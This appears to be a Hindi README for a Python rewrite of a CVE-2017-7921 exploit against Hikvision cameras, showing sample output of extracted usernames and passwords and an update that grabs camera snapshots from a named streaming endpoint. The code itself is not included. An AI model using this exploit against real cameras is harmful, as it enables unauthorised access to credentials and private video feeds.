
मेरे द्वारा पायथन में लिखा गया सरल CVE-2017-7921 रीराइट। केवल शैक्षिक उद्देश्यों के लिए!
सरल CVE-2017-7921 पुनर्लेखन Python में मेरे द्वारा। केवल शैक्षिक उद्देश्यों के लिए!
बहुत सरल, मैंने IP जैसी चीज़ों के लिए जाँच और प्रतिक्रिया के लिए उन्नत जाँच शामिल नहीं की। मैंने इसे एक कैमरे पर परीक्षण किया जिसे मैं परीक्षण करने के लिए अधिकृत हूँ (अपने स्थानीय नेटवर्क के भीतर) और यह पूरी तरह से काम करता हुआ प्रतीत होता है।
#उदाहरण आउटपुट:
python 2017.py
found usernames: admin,defualt
admin:Pa$$W0rd
defualt:Xf07732479
यह उन क्रेडेंशियल्स से मेल खाता है जो हमें प्राप्त होंगे यदि हम "msfconsole" पर वही एक्सप्लॉइट उपयोग करते हैं
[*] User Credentials Information:
-----------------------------
User:admin | ID:1 | Role:Administrator | Password: Pa$$W0rd
User:defualt | ID:2 | Role:Operator | Password: Xf07732479
#स्रोत वास्तविक विवरण: https://medium.com/@k3yb0ard/when-you-pay-to-sell-your-own-privacy-a-technical-deep-dive-into-cve-2017-7921-hikvision-auth-576b581f4afe
cve: https://nvd.nist.gov/vuln/detail/cve-2017-7921
#अपडेट
स्नैपशॉट भी जोड़ा गया है जो आपको /Streaming/channels/1/picture से स्नैपशॉट लेने और इसे ip.jpg फ़ाइल में सहेजने की अनुमति देता है।